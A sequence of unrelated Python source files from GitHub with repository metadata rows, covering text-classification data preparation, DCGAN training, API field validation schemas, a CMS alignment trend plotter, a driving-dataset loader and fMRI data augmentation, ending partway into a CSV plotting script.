def read_pos_and_neg_data(header=True):
    """Read positive and negative example TSVs as (label, text) tuples.

    header: if True, skip the first line of each file.
    Returns positives (label 1) followed by negatives (label 0).
    """
    with open('./data/raw_input_neg_500k.tsv', 'rt') as f:
        f.readline() if header else None
        lines = f.readlines()
    # Negatives: text is in the 4th tab-separated column.
    negatives = [(0, line.split('\t')[3]) for line in lines]
    print('num of negative examples: {}'.format(len(negatives)))
    with open('./data/raw_input_pos_500k.tsv', 'rt') as f:
        f.readline() if header else None
        lines = f.readlines()
    # Positives: the whole line is used as text -- presumably the positive
    # file has a different layout than the negative file; TODO confirm.
    positives = [(1, line) for line in lines]
    print('num of positive examples: {}'.format(len(positives)))
    return positives + negatives
def write_dev_train_sets(label_texts, path_template, p=0.1):
    """
    Split (label, text) tuples into dev and train pickles.

    Approximately p of the examples (after shuffling) go to the dev set and
    the rest to the train set. path_template must contain one '{}' slot,
    filled with 'dev' or 'train'.

    Args:
        label_texts: iterable of (label, text) tuples.
        path_template: output path template, e.g. './data/{}_set.pickle'.
        p: fraction of examples used for the dev set.
    """
    print('saving dev and training data sets...')
    # sample p% for dev use
    label_texts = list(label_texts)
    np.random.shuffle(label_texts)
    dev_size = int(p * len(label_texts))
    # BUGFIX: split via an explicit index. The old [-dev_size:] / [:-dev_size]
    # slicing put EVERYTHING in dev (and nothing in train) when dev_size == 0.
    split = len(label_texts) - dev_size
    with open(path_template.format('dev'), 'wb') as df:
        pickle.dump(label_texts[split:], df)
    with open(path_template.format('train'), 'wb') as tf:
        pickle.dump(label_texts[:split], tf)
def preprocess_raw_inputs_and_save():
    """Full preprocessing pipeline: read raw TSVs, clean/normalize text,
    build the vocabulary, and persist timestamped vocab/dev/train pickles."""
    labels, texts = zip(*read_pos_and_neg_data())
    sentences = [raw_text_to_sentence(text) for text in texts]
    # Pad/cut all sentences to a fixed length of 68 words.
    normalized_sentences = normalize_sentence_length(sentences, max_length_words=68)
    vocab, inv_vocab = build_vocab(normalized_sentences)
    # Timestamp suffix keeps successive runs from overwriting each other.
    ts = datetime.datetime.now().strftime('%Y-%m-%d.%H%M%S')
    path_template = './data/{{}}_set.pickle.{}'.format(ts)
    with open('./data/vocab.pickle.{}'.format(ts), 'wb') as vocab_file:
        pickle.dump((vocab, inv_vocab), vocab_file)
    write_dev_train_sets(zip(labels, normalized_sentences), path_template, p=0.1)
def load_input_data(example_path, vocab_path):
    """Load pickled examples and vocabulary, returning vectorized arrays
    via build_input_data."""
    with open(example_path, 'rb') as f:
        labels, sentences = zip(*pickle.load(f))
    with open(vocab_path, 'rb') as v:
        vocabulary, inv_vocabulary = pickle.load(v)
    return build_input_data(sentences, labels, vocabulary, inv_vocabulary)
def batch_iter(data, batch_size, num_epochs):
    """
    Generates a batch iterator for a dataset, reshuffling every epoch.
    Note: when len(data) divides batch_size evenly, a trailing empty batch
    is yielded each epoch (inherited behavior).
    """
    data = np.array(data)
    data_size = len(data)
    num_batches_per_epoch = int(len(data) / batch_size) + 1
    for _ in range(num_epochs):
        # New random order at each epoch.
        order = np.random.permutation(np.arange(data_size))
        shuffled = data[order]
        for batch_num in range(num_batches_per_epoch):
            start = batch_num * batch_size
            stop = min(start + batch_size, data_size)
            yield shuffled[start:stop]
| jimmec/tensorflow-demo | data_helper.py | data_helper.py | py | 5,772 | python | en | code | 2 | github-code | 50 |
12900342798 | #coding=utf-8
"""Train DCGAN"""
import glob
import numpy as np
from scipy import misc
import tensorflow as tf
from DCGAN import *
#Hyperparameter
EPOCH = 100
BATCH_SIZE = 128
LEARNING_RATE =0.0002
Beta_1 = 0.5
def train():
    """Train the DCGAN: alternate discriminator and generator updates."""
    # Load the training images.
    data = []
    for image in glob.glob("image/*"):
        image_data = misc.imread(image)  # returns the image as an array
        data.append(image_data)
    input_data = np.array(data)
    # Normalize to [-1, 1], the output range of tanh.
    input_data = (input_data.astype(np.float32) - 127.5) / 127.5
    # Build the generator, the discriminator, and the stacked model.
    g = generator_model()
    d = discriminator_model()
    d_on_g = generator_containing_discriminator(g, d)
    # BUGFIX: the module constant is LEARNING_RATE; the old lowercase
    # `learning_rate` was undefined (NameError at runtime).
    g_optimizer = tf.keras.optimizers.Adam(lr=LEARNING_RATE, beta_1=Beta_1)
    d_optimizer = tf.keras.optimizers.Adam(lr=LEARNING_RATE, beta_1=Beta_1)
    # Configure the generator and the discriminator.
    g.compile(loss="binary_crossentropy", optimizer=g_optimizer)
    d.compile(loss="binary_crossentropy", optimizer=d_optimizer)
    # d.trainable toggles whether discriminator weights update; it is frozen
    # while the generator is optimized through the stacked model.
    d.trainable = True
    d_on_g.compile(loss="binary_crossentropy", optimizer=d_optimizer)
    for epoch in range(EPOCH):
        for index in range(int(input_data.shape[0] / BATCH_SIZE)):
            # BUGFIX: was the typo `ipnut_data` (NameError).
            input_batch = input_data[index * BATCH_SIZE:(index + 1) * BATCH_SIZE]
            # Uniform random noise as the generator input.
            random_data = np.random.uniform(-1, 1, size=(BATCH_SIZE, 100))
            generated_images = g.predict(random_data, verbose=0)
            # Real images labeled 1, generated images labeled 0.
            input_batch = np.concatenate((input_batch, generated_images))
            output_batch = [1] * BATCH_SIZE + [0] * BATCH_SIZE
            # Train the discriminator to reject generated images.
            d_loss = d.train_on_batch(input_batch, output_batch)
            # Freeze the discriminator while training the generator.
            d.trainable = False
            # Train the generator through the (frozen) discriminator.
            g_loss = d_on_g.train_on_batch(random_data, [1] * BATCH_SIZE)
            # Make the discriminator trainable again.
            d.trainable = True
            # Report losses.
            print("Step %d Generator Loss: %f Discriminator Loss: %f" % (index, g_loss, d_loss))
if __name__ == "__main__":
train() | Jumponthemoon/DeepLearning_GAN | train.py | train.py | py | 2,567 | python | en | code | 0 | github-code | 50 |
1581667461 | # -*- coding: utf-8 -*-
from utils import fields
from utils import validate
from module.common import GetResource
from module.common import field_inputs_wrap as _field_inputs_wrap
from module.common import field_inputs_ref as _field_inputs_ref
from module.common import field_inputs as _field_inputs
from module.common import field_inputs_wrap_head
# for serialize
from .__init__ import __customer_business_head__ as __head__, \
__customer_business_heads__ as __heads__, \
__customer_business_detail_head__ as __head_detail__, \
__customer_business_detail_rates_head__ as __head_detail_rates__, \
__customer_business_detail_deals_head__ as __head_detail_deals__, \
__customer_business_detail_images_url_head__ as __head_detail_images_url__
# Field schemas for the customer "business" endpoints.  Each entry pairs a
# marshalling `type` (utils.fields) with a reqparse `validator`
# (utils.validate); the dicts are compiled into resource fields by
# GetResource at the bottom of this module.
field_inputs = _field_inputs.copy()
field_inputs_ref = _field_inputs_ref.copy()
field_inputs_wrap = _field_inputs_wrap.copy()
field_inputs['image_url'] = {
    'type': fields.String(),
    'required': True,
    'validator': validate.str_range(argument={'low': 1, 'high': 255})
}
field_inputs['cat'] = {
    'required': True,
    'validator': validate.natural(),
    'type': fields.Integer()
}
# NOTE(review): lat/long are marshalled as Float but validated as a string
# range — confirm validate.str_range accepts float input before changing.
field_inputs['lat'] = {
    'required': True,
    #'validator': validate.Float(),
    'validator': validate.str_range(argument={'low': 1, 'high': 255}),
    'type': fields.Float()
}
field_inputs['long'] = field_inputs['lat'].copy()
field_inputs['deal'] = field_inputs['cat'].copy()
field_inputs_wrap['orderBy'] = {
    'validator': validate.str_in_list(
        default='name',
        argument=['name', 'description'],
    ),
    'type': fields.String(default='name'),
}
# TODO: use validate.float
# Per-detail schemas (business detail page, its rates/deals/gallery images).
field_inputs_detail = {}
field_inputs_detail_rates = {}
field_inputs_detail_deals = {}
field_inputs_detail_images_url = {}
field_inputs_detail['rate'] = {
    #'validator': validate.str_range(argument={'low': 1, 'high': 255}),
    #'type': fields.Float(default=0)
    'validator': validate.natural(),
    'type': fields.Integer()
}
field_inputs_detail_rates['id'] = {
    'validator': validate.natural(),
    'type': fields.Integer()
}
field_inputs_detail_rates['avatar_url'] = {
    'validator': validate.str_range(argument={'low': 1, 'high': 255}),
    'type': fields.String()
}
# NOTE(review): both 'type' and 'validator' below are wrapped in a set
# literal ({ ... }) — verify GetResource really expects a set here and not
# the bare fields.List value.
field_inputs_detail['deals'] = {
# type attribute for marshal
    'type': { fields.List(fields.Nested({
        'title': {'type': fields.String(attribute='title')},
        'description': {'type': fields.String(attribute='description')},
        }))
    },
# validate attribute for reqparse
    'validator': { fields.List(fields.Nested({
        'title':{'type': validate.str_range(argument={'low': 1, 'high': 64})},
        'description':{'type': validate.str_range(argument={'low': 1, 'high': 64})}
        }))
    }
}
field_inputs_detail_deals['title'] = {
    'validator': validate.str_range(argument={'low': 1, 'high': 255}),
    'type': fields.String()
}
field_inputs_detail_deals['description'] = {
    'validator': validate.str_range(argument={'low': 1, 'high': 255}),
    'type': fields.String()
}
field_inputs_detail['name'] = {
    'validator': validate.str_range(argument={'low': 1, 'high': 254}),
    'type': fields.String()
}
# NOTE: 'rate' was already defined above with identical content; this
# redefinition is redundant but harmless.
field_inputs_detail['rate'] = {
    'validator': validate.natural(),
    'type': fields.Integer()
    #'validator': validate.str_range(argument={'low': 1, 'high': 255}),
    ## TODO: support fields.Float
    #'type': fields.String()
}
field_inputs_detail['id'] = {
    'validator': validate.natural(),
    'type': fields.Integer()
}
field_inputs_detail['rate_nr'] = {
    'validator': validate.natural(),
    'type': fields.Integer()
}
field_inputs_detail['user_nr'] = {
    'validator': validate.natural(),
    'type': fields.Integer()
}
#field_inputs_detail['comments'] = {
## type attribute for marshal
#    'type': { fields.List(fields.Nested({
#        'id': {'type': fields.Integer()},
#        'avatar_url': {'type': fields.String(attribute='description')},
#    }))
#    },
## validate attribute for reqparse
#    'validator': { fields.List(fields.Nested({
#        'id':{'type': fields.Integer()},
#        'avatar_url':{'type': validate.str_range(argument={'low': 1, 'high': 64})}
#    }))
#    }
#    }
field_inputs_detail['gallery_nr'] = {
    'validator': validate.natural(),
    'type': fields.Integer()
}
field_inputs_detail['meals'] = {
    'validator': validate.str_range(argument={'low': 1, 'high': 254}),
    'type': fields.String()
}
field_inputs_detail['features'] = {
    'validator': validate.str_range(argument={'low': 1, 'high': 254}),
    'type': fields.String()
}
field_inputs_detail['open'] = {
    'validator': validate.str_range(argument={'low': 1, 'high': 4}),
    'type': fields.String()
}
field_inputs_detail['address'] = {
    'validator': validate.str_range(argument={'low': 1, 'high': 254}),
    'type': fields.String()
}
field_inputs_detail['dist'] = {
    'validator': validate.natural(),
    'type': fields.Integer()
}
field_inputs_detail['is_favorite'] = {
    'validator': validate.natural(default = 0),
    'type': fields.Integer(default = 0)
}
field_inputs_detail['close'] = field_inputs_detail['open'].copy()
# POST schema: same as the list schema minus read-only fields, plus a few
# detail fields copied over.
field_inputs_post = field_inputs.copy()
field_inputs_post.pop('image_url')
field_inputs_post.pop('id')
for v in ['dist', 'open', 'close', 'address', 'meals', 'features', 'deals']:
    field_inputs_post[v] = field_inputs_detail[v].copy()
field_inputs_detail_images_url['bg'] = {
    'validator': validate.str_range(argument={'low': 1, 'high': 255}),
    'type': fields.String()
}
field_inputs_detail_images_url['icon'] = {
    'validator': validate.str_range(argument={'low': 1, 'high': 255}),
    'type': fields.String()
}
# TODO: support multi layer
# Compile the schemas into resource field tuples for serialization.
resource_fields_detail_rates, resource_fields_ref, resource_fields_detail = GetResource(
    field_inputs_detail_rates, field_inputs_ref, field_inputs_detail, __head_detail_rates__)
resource_fields_detail_deals, resource_fields_ref, resource_fields_detail = GetResource(
    field_inputs_detail_deals, field_inputs_ref, field_inputs_detail, __head_detail_deals__)
resource_fields_detail_images_url, resource_fields_ref, resource_fields_detail = GetResource(
    field_inputs_detail_images_url, field_inputs_ref, field_inputs_detail, __head_detail_images_url__)
resource_fields_post, resource_fields_ref, resource_fields_wrap = GetResource(
    field_inputs_post, field_inputs_ref, field_inputs_wrap, field_inputs_wrap_head)
#resource_fields, resource_fields_ref, resource_fields_wrap = GetResource(
#    field_inputs_detail, field_inputs_ref, field_inputs, __head_detail__)
resource_fields, resource_fields_ref, resource_fields_wrap = GetResource(
    field_inputs, field_inputs_ref, field_inputs_wrap, field_inputs_wrap_head)
| arvin-chou/mc | module/customer/business_valid.py | business_valid.py | py | 7,332 | python | en | code | 0 | github-code | 50 |
40091656390 | from __future__ import print_function
import ROOT
ROOT.gROOT.SetBatch(True)
from setTDRStyle import setTDRStyle
from granularity import *
import os
try:
base = os.environ['CMSSW_BASE']
except KeyError:
base = "../../../../.."
# Per-year "lumi per run" text files (format: "<run> <lumi in pb^-1>" per line).
lumiFiles = {
    2016: "{base}/src/Alignment/APEEstimation/data/lumiperrun2016.txt",
    2017: "{base}/src/Alignment/APEEstimation/data/lumiperrun2017.txt",
    2018: "{base}/src/Alignment/APEEstimation/data/lumiperrun2018.txt",
}
# First run of each pixel alignment IOV, per year (drawn as vertical lines).
pixelIOVs = {
    2016: [271866, 276315, 278271, 280928],
    2017: [297281, 298653, 299443, 300389, 301046, 302131, 303790, 303998, 304911],
    2018: [316758, 317527, 317661, 317664, 318227, 320377],
}
# Module-level lookup tables filled below:
#   lumis:    run number -> integrated luminosity of that run [fb^-1]
#   runs:     year -> list of run numbers (file order)
#   intLumis: year -> total luminosity of the year [fb^-1]
#   years:    sorted list of available years
lumis = {}
intLumis = {}
runs = {}
years = []
for year in lumiFiles.keys():
    runs[year] = []
    years.append(year)
    intLumis[year] = 0
    with open(lumiFiles[year].format(base=base), "r") as fi:
        for line in fi:
            if len(line) == 0:
                continue
            line = line.strip()
            run, lumi = line.split(" ")
            run = int(run)
            lumi = float(lumi)*0.001 # convert pb^-1 to fb^-1
            lumis[run] = lumi
            runs[year].append(run)
            intLumis[year] += lumi
years.sort()
def runToLumi(whichRun, fromYear, inclusive=False):
    """Integrated luminosity accumulated between the start of `fromYear`
    and run `whichRun` (the run itself counted only if `inclusive`).

    Uses the module-level `years`, `runs` and `lumis` tables.
    """
    total = 0.0
    for year in (y for y in years if y >= fromYear):
        for run in runs[year]:
            if run > whichRun:
                break
            if run < whichRun or (inclusive and run == whichRun):
                total += lumis[run]
    return total
def whichYear(run):
    """Return the latest year whose smallest run number is <= `run`.

    Relies on the module-level `runs` dict (year -> list of run numbers).
    Returns -1 (and prints a warning) when no year matches.

    BUGFIX: the warning and the trailing `return -1` were dead code placed
    after an unconditional `return`, so the warning could never fire.
    """
    thisYear = -1
    for year in sorted(runs.keys()):
        if min(runs[year]) <= run:
            thisYear = year
    if thisYear == -1:
        print("Run %d not in range of any year"%(run))
    return thisYear
class TrendPlotter:
    """Draws APE (alignment position error) trend plots per detector sector
    and coordinate, versus integrated luminosity or run number, for one or
    more labelled trends registered via addTrend()."""
    def __init__(self):
        setTDRStyle()
        self.names = {}
        self.outPath = None                    # output directory for the PDFs
        self.granularity = standardGranularity # sector layout (from granularity.py)
        self.title = ""                        # text drawn top-left (e.g. "CMS Preliminary")
        self.points = []                       # registered trends, see addTrend()
        self.years = []
        self.doLumi = True                     # x axis: luminosity (True) or run number
        self.colors = []                       # colors already taken by trends
        self.log = False                       # logarithmic y axis
    def addTrend(self, label, points, dashed=False, color=None, marker=None):
        """Register one trend; `points` is a list of (firstRun, lastRun, resultFile)."""
        self.points.append( (label, points, dashed, color, marker) )
        if color:
            self.colors.append(color)
    def setGranularity(self, granularity):
        self.granularity = granularity
    def setOutputPath(self, outPath):
        self.outPath = outPath
    def setTitle(self, title):
        self.title = title
    def setLog(self, log=True):
        self.log = log
    def convertName(self, name):
        """Abbreviate an internal sector name for display (e.g. BpixLayer1 -> 'BPIX L1')."""
        out = name.replace("Bpix", "BPIX")
        out = out.replace("Fpix", "FPIX")
        out = out.replace("Plus", "+")
        out = out.replace("Minus", "-")
        out = out.replace("Fpix", "FPIX")
        out = out.replace("Tib", "TIB")
        out = out.replace("Tob", "TOB")
        out = out.replace("Tid", "TID")
        out = out.replace("Tec", "TEC")
        out = out.replace("Layer", " L")
        out = out.replace("Ring", " R")
        out = out.replace("Stereo", "S")
        out = out.replace("Rphi", "R") # other than Ring, this one does not add a space in front
        out = out.replace("In", "i")
        out = out.replace("Out", "o")
        return out
    def drawTrendPlot(self, sector, coordinate, number):
        """Draw and save the trend plot for one sector/coordinate.

        Reads the last-iteration APE value for `sector` from each result
        file, plots one graph per trend, marks pixel IOV boundaries as red
        dashed lines, and writes a PDF under outPath/<granularity name>.
        """
        self.canvas = ROOT.TCanvas("canvas%s_%s"%(sector, coordinate), "canvas", int(ROOT.gStyle.GetCanvasDefW()*3),ROOT.gStyle.GetCanvasDefH())
        ROOT.gPad.SetLeftMargin(0.06)
        ROOT.gPad.SetRightMargin(0.04)
        iTrend = 0
        # y-axis range in micrometers
        if self.log:
            minApe = 0.9
            maxApe = 7000.0
            ROOT.gPad.SetLogy()
        else:
            minApe = 0
            maxApe = 100
        # calibrate runrange: overall first/last run across all trends
        firstRun = 999999
        lastRun = 0
        for label, points, dashed, color, marker in self.points:
            firstRun = min(min(points, key=lambda x:x[0])[0], firstRun)
            lastRun = max(max(points, key=lambda x:x[1])[1], lastRun)
        theFirstRun = firstRun
        theLastRun = lastRun
        firstYear = whichYear(firstRun)
        lastYear = whichYear(lastRun)
        # x-axis range in integrated luminosity: sum of the covered years
        minLumi = 0
        maxLumi = 0
        for year in intLumis.keys():
            if year >= firstYear and year <= lastYear:
                maxLumi += intLumis[year]
        # vertical markers (and staggered run-number labels) at pixel IOV starts
        verticalLines = []
        lineLabels = []
        i = 0
        for year in range(firstYear, lastYear+1):
            for position in pixelIOVs[year]:
                if self.doLumi:
                    posLumi = runToLumi(position, firstYear, False)
                else:
                    posLumi = position
                vLine = ROOT.TLine(posLumi,minApe,posLumi,maxApe)
                vLine.SetLineStyle(9)
                vLine.SetLineColor(ROOT.kRed)
                verticalLines.append(vLine)
                posApe = 70+3.5*(maxApe-minApe)/100*(i % 5)
                text = ROOT.TLatex(posLumi + (maxLumi-minLumi)*0.003 , posApe, str(position))
                text.SetTextFont(42)
                text.SetTextSize(0.035)
                text.SetTextColor(ROOT.kRed+2)
                lineLabels.append(text)
                i += 1
        legend = ROOT.TLegend(0.07, 0.89, 0.935, 0.96)
        legend.SetTextFont(42)
        legend.SetTextSize(0.045)
        legend.SetFillStyle(0)
        legend.SetBorderSize(0)
        legend.SetNColumns(5)
        # axis frame: luminosity or run number on x, sigma_align on y
        if self.doLumi:
            hAxisLumi = ROOT.TH2F("hAxisRun%s_%s"%(sector, coordinate),"", 10, float(minLumi), float(maxLumi), 10, minApe, maxApe)
            hAxisLumi.SetTitle(";integrated luminosity [fb^{-1}];#sigma_{align," + coordinate.lower() + "} [#mum]")
        else:
            hAxisLumi = ROOT.TH2F("hAxisRun%s_%s"%(sector, coordinate),"", 10, theFirstRun, theLastRun, 10, minApe, maxApe)
            hAxisLumi.SetTitle(";Run number;#sigma_{align," + coordinate.lower() + "} [#mum]")
        hAxisLumi.GetYaxis().SetTitleOffset(0.4)
        hAxisLumi.GetXaxis().SetNdivisions(510)
        hAxisLumi.Draw("AXIS")
        trends = []
        useColor = 1
        for label, points, dashed, color, marker in self.points:
            iTrend += 1
            graphLumi = ROOT.TGraphErrors()
            trends.append(graphLumi)
            if color:
                graphLumi.SetLineColor(color)
                graphLumi.SetMarkerColor(color)
            else:
                # pick the next free ROOT color (0 and 10 are white-ish)
                while True:
                    if useColor not in self.colors and useColor not in [0,10]:
                        self.colors.append(useColor)
                        graphLumi.SetLineColor(useColor)
                        graphLumi.SetMarkerColor(useColor)
                        break
                    useColor += 1
            if marker:
                graphLumi.SetLineWidth(0)
                graphLumi.SetMarkerSize(1.3)
                graphLumi.SetMarkerStyle(marker)
            else:
                graphLumi.SetLineWidth(2)
                graphLumi.SetMarkerSize(0)
                graphLumi.SetMarkerStyle(20)
            if dashed:
                graphLumi.SetLineStyle(2)
            iPoint = 0
            for firstRun, lastRun, file in points:
                fi = ROOT.TFile(file, "READ")
                nameTree = fi.Get("nameTree")
                apeTree = fi.Get("iterTree{}".format(coordinate))
                nameTree.GetEntry(0)
                apeTree.GetEntry(apeTree.GetEntries()-1)
                # APE is stored as a variance in cm^2; convert to micrometers
                sectorApe = 10000. * (float(getattr(apeTree, "Ape_Sector_{}".format(sector))))**0.5
                sectorName = str(getattr(nameTree, "Ape_Sector_{}".format(sector)))
                # this could be done centrally for each trend and then not be redone for each sector
                # but it does not take too much time (most time is spent reading out ROOT files)
                if self.doLumi:
                    lumiStart = runToLumi(firstRun, firstYear, False)
                    lumiEnd = runToLumi(lastRun, firstYear, True)
                else:
                    lumiStart = firstRun
                    lumiEnd = lastRun
                # point at the center of the run range, x-error spans the range
                xPosLumi = (lumiStart+lumiEnd) / 2
                xErrLumi = -(lumiStart-lumiEnd) / 2
                graphLumi.SetPoint(iPoint, xPosLumi, sectorApe)
                graphLumi.SetPointError(iPoint, xErrLumi,0)
                iPoint += 1
                fi.Close()
            graphLumi.Draw("PZ same")
            if marker:
                legend.AddEntry(graphLumi, label, "pl")
            else:
                legend.AddEntry(graphLumi, label, "l")
        cmsText = ROOT.TLatex(0.16,0.96,self.title)
        cmsText.SetTextFont(42)
        cmsText.SetNDC()
        cmsText.Draw("same")
        # NOTE(review): sectorName is only bound inside the loop above, so an
        # empty trend list would raise NameError here — confirm callers always
        # register at least one trend with points.
        sectorText = ROOT.TLatex(0.9,0.96,sectorName)
        sectorText.SetTextAlign(31)
        sectorText.SetTextFont(42)
        sectorText.SetNDC()
        sectorText.Draw("same")
        for vLine in verticalLines:
            vLine.Draw("same")
        for llabel in lineLabels:
            llabel.Draw("same")
        legend.Draw("same")
        ROOT.gPad.RedrawAxis()
        import os
        if not os.path.isdir("{}/{}".format(self.outPath, self.granularity.names[coordinate][number])):
            os.makedirs("{}/{}".format(self.outPath, self.granularity.names[coordinate][number]))
        app = ""
        if not self.doLumi:
            app = "_byRun"
        self.canvas.SaveAs("{}/{}/trend_{}_{}{}.pdf".format(self.outPath, self.granularity.names[coordinate][number], coordinate, sectorName, app))
        self.canvas = None
    def draw(self):
        """Draw one trend plot per sector of every coordinate in the granularity."""
        for coordinate in self.granularity.sectors.keys():
            plotNumber = 0
            rangeList = self.granularity.sectors[coordinate]
            for sectorRange in rangeList:
                for sector in range(sectorRange[0], sectorRange[1]+1):
                    self.drawTrendPlot(sector, coordinate, plotNumber)
                plotNumber += 1
def main():
    """Placeholder entry point; plots are produced by importing TrendPlotter."""
    pass
if __name__ == "__main__":
    main()
| cms-sw/cmssw | Alignment/APEEstimation/test/plottingTools/trendPlotter.py | trendPlotter.py | py | 10,561 | python | en | code | 985 | github-code | 50 |
71090059675 |
# base class
from Code.dataset.dataloader import Loader
# data manipulation and tools
import numpy as np
from Code.dataset.DataModel import *
import os
# shifts libraries
from ysdc_dataset_api.dataset import MotionPredictionDataset
from ysdc_dataset_api.features import FeatureRenderer
from ysdc_dataset_api.utils import get_file_paths, scenes_generator, transform_2d_points, VehicleTrack
class ShiftsLoader(Loader):
    """Loader for the Yandex Shifts motion-prediction dataset.

    Reads scene protobufs via ysdc_dataset_api and fills the dataset
    structure (agents, ego vehicles, per-timestep contexts) defined by
    the Loader base class; optionally round-trips through a pickle cache.
    """
    def __init__(self, DATAROOT, pickle=True, pickle_filename='/data/shifts/data.pkl', chunk=(0, 1000), verbose=True):
        # super constructor (presumably creates self.dataset — defined in Loader)
        super(ShiftsLoader, self).__init__(DATAROOT, verbose)
        self.renderer = None
        # flag to indicate if data can be loaded from pickle files
        pickle_ok: bool = os.path.isfile(pickle_filename)
        if pickle and pickle_ok:
            # its okay to read pickle files to load data
            self.load_pickle_data(pickle_filename)
        else:
            # load data from scratch and cache it for the next run
            self.load_data(chunk)
            self.save_pickle_data(pickle_filename)
        ShiftsAgent.context_dict = self.dataset.contexts
    def load_ego_vehicles_and_context(self, ego_id, ego_steps, location=None):
        """Create the ego vehicle for a scene and one Context per timestep."""
        ego_vehicle = ShiftsEgoVehicle(ego_id, location)
        self.dataset.add_ego_vehicle(ego_id, ego_vehicle)
        for i, step in enumerate(ego_steps):
            # step_id doubles as the id of the context object for this timestep
            step_id = ego_id + '_' + str(i)
            self.dataset.add_context(step_id, Context(step_id))
            step = ShiftsEgoStep(step.position.x, step.position.y, step.yaw, step.linear_velocity.x,
                                 step.linear_velocity.y, step.linear_acceleration.x, step.linear_acceleration.y)
            ego_vehicle.add_step(step_id, step)
    def load_data(self, chunk=(0, 1000)):
        """Read scene files chunk[0]:chunk[1] and populate the dataset."""
        def get_step(track, ego):
            # Build one agent timestep carrying the ego pose alongside it.
            agent_step = ShiftTimeStep(track.position.x, track.position.y, track.yaw, track.linear_velocity.x,
                                       track.linear_velocity.y, track.linear_acceleration.x, track.linear_acceleration.y,
                                       ego.position.x, ego.position.y, ego.yaw)
            return agent_step
        filepaths = get_file_paths(self.DATAROOT)
        scenes_paths = scenes_generator(filepaths[chunk[0]: chunk[1]], yield_fpath=True)
        # traverse scenes
        for scene, path in scenes_paths:
            # tracks of interest (those flagged for prediction)
            prediction_requests_ids = {pr.track_id for pr in scene.prediction_requests}
            # join past and future steps
            timesteps = list(scene.past_vehicle_tracks) + list(scene.future_vehicle_tracks)
            ego_steps = list(scene.past_ego_track) + list(scene.future_ego_track)
            # load ego vehicle and contexts of the scene
            self.load_ego_vehicles_and_context(scene.id, ego_steps, location=path)
            # traverse each timestep
            for i, (track_step, ego_step) in enumerate(zip(timesteps, ego_steps)):
                context_id = scene.id + '_' + str(i)
                # traverse all agents
                for track in track_step.tracks:
                    # build an agent id unique across the whole dataset
                    agent_id = scene.id + '_' + str(track.track_id)
                    # if agent IS NOT A CANDIDATE FOR PREDICTION, add as non prediction agent
                    if track.track_id not in prediction_requests_ids:
                        # CREATE agent if it does not exist. Use path as map name (SEE ShiftsAgent doc)
                        if self.dataset.non_pred_agents.get(agent_id) is None:
                            self.dataset.non_pred_agents[agent_id] = ShiftsAgent(agent_id, scene.id, path)
                        # insert timestep, step_id = context_id
                        self.dataset.non_pred_agents[agent_id].add_step(context_id, get_step(track, ego_step))
                        # insert as non prediction neighbor
                        self.dataset.contexts[context_id].add_non_pred_neighbor(agent_id)
                    else:
                        # CREATE agent if it does not exist. Use path as map name (SEE ShiftsAgent doc)
                        if self.dataset.agents.get(agent_id) is None:
                            print('new agent: ', agent_id) if self.verbose else None
                            self.dataset.agents[agent_id] = ShiftsAgent(agent_id, scene.id, path)
                        # insert timestep, step_id = context_id
                        self.dataset.agents[agent_id].add_step(context_id, get_step(track, ego_step))
                        # insert agent as neighbor (scene.id + i = context_id or same as step_id)
                        self.dataset.contexts[context_id].add_pred_neighbor(agent_id)
| Juan-Baldelomar/Vehicle_Trajectory_Forecasting | Code/dataset/shifts_dataloader.py | shifts_dataloader.py | py | 4,816 | python | en | code | 5 | github-code | 50 |
7521405350 | import os
import numpy as np
import pandas as pd
import re
import tsaug
from tsaug.visualization import plot
'''
Segmentation of time series and addition of noise
'''
# Source directory with per-subject fMRI time-series spreadsheets, and the
# directory into which the augmented .npy segments are written.
old_path = './data_fMRI'
save_path = 'data_augm'
# NOTE(review): os.walk recurses; for nested directories `read_path` below is
# built from old_path rather than root_dir — confirm data_fMRI is only one
# level deep.
for root_dir, sub_dirs, _ in os.walk(old_path):
    for sub_dir in sub_dirs:
        save_dir = os.path.join(save_path, sub_dir)
        # Create the output directory, or empty it if it already exists.
        if not os.path.exists(save_dir):
            os.makedirs(save_dir)
        else:
            file_names = os.listdir(save_dir)
            for files in file_names:
                c_path = os.path.join(save_dir, files)
                os.remove(c_path)
        file_names = os.listdir(os.path.join(root_dir, sub_dir))
        # Skip the ROI coordinate sheet — it is not a time series.
        file_names = list(filter(lambda x: x != 'ROI_CenterOfMass.xlsx', file_names))
        for file in file_names:
            read_path = os.path.join(old_path, sub_dir, file)
            init_data = pd.read_excel(read_path, header=None)
            n = np.array(init_data)
            # Two augmented variants: additive noise and Hann-window smoothing.
            # tsaug augments along the last axis, hence the transposes.
            noised_init_data = tsaug.AddNoise(scale=0.12).augment(n.T)
            noised_init_data = noised_init_data.T
            noised_init_data2 = tsaug.Convolve(window="hann", size=5).augment(n.T)
            noised_init_data2 = noised_init_data2.T
            # X = np.array(init_data)
            # plot(X)
            # Split each series (original + both variants) into 5 equal segments.
            n = int(init_data.shape[0] / 5)
            for i in range(5):
                single_data = init_data[i * n:(i + 1) * n]
                noised_single_data = noised_init_data[i * n:(i + 1) * n]
                noised_single_data2 = noised_init_data2[i * n:(i + 1) * n]
                file_save_name = re.sub(r'.xlsx', '_%i.npy' % i, file)
                noised_file_save_name = re.sub(r'.xlsx', '_noised_%i.npy' % i, file)
                noised_file_save_name2 = re.sub(r'.xlsx', '_noised2_%i.npy' % i, file)
                np.save(os.path.join(save_dir, file_save_name), single_data)
                np.save(os.path.join(save_dir, noised_file_save_name), noised_single_data)
                np.save(os.path.join(save_dir, noised_file_save_name2), noised_single_data2)
| GraphW/LGSL | augmentation.py | augmentation.py | py | 2,139 | python | en | code | 1 | github-code | 50 |
39754220100 | import matplotlib.pyplot as plt
from statistics import mean, stdev
from sys import argv
from glob import glob
import csv
__author__ = "Garance Gourdel, Pierre Peterlongo"
__email__ = "pierre.peterlongo@inria.fr, garance.gourdel@inria.fr"
def reorder(x, y_dict):
    """Reorder every series in `y_dict` so its values follow ascending `x`.

    Sorting is done on indices keyed by x only, so y values are never
    compared.  This fixes two defects of the previous version, which
    sorted (x, y) pairs directly: it crashed on an empty `x`
    (unpacking `zip(*[])`), and on tied x values it compared the y
    values themselves, which can raise TypeError for mixed types.

    Returns a new dict with the same keys and reordered value lists.
    """
    order = sorted(range(len(x)), key=x.__getitem__)
    return {k: [y[i] for i in order] for k, y in y_dict.items()}
def parse_csv(filename):
    """Parse one experiment CSV into a dict of parameters and result columns.

    Row 0 holds the simulation parameters, row 1 the column headers, and
    rows 2+ one record per simulated sequence.  Returns a dict with scalar
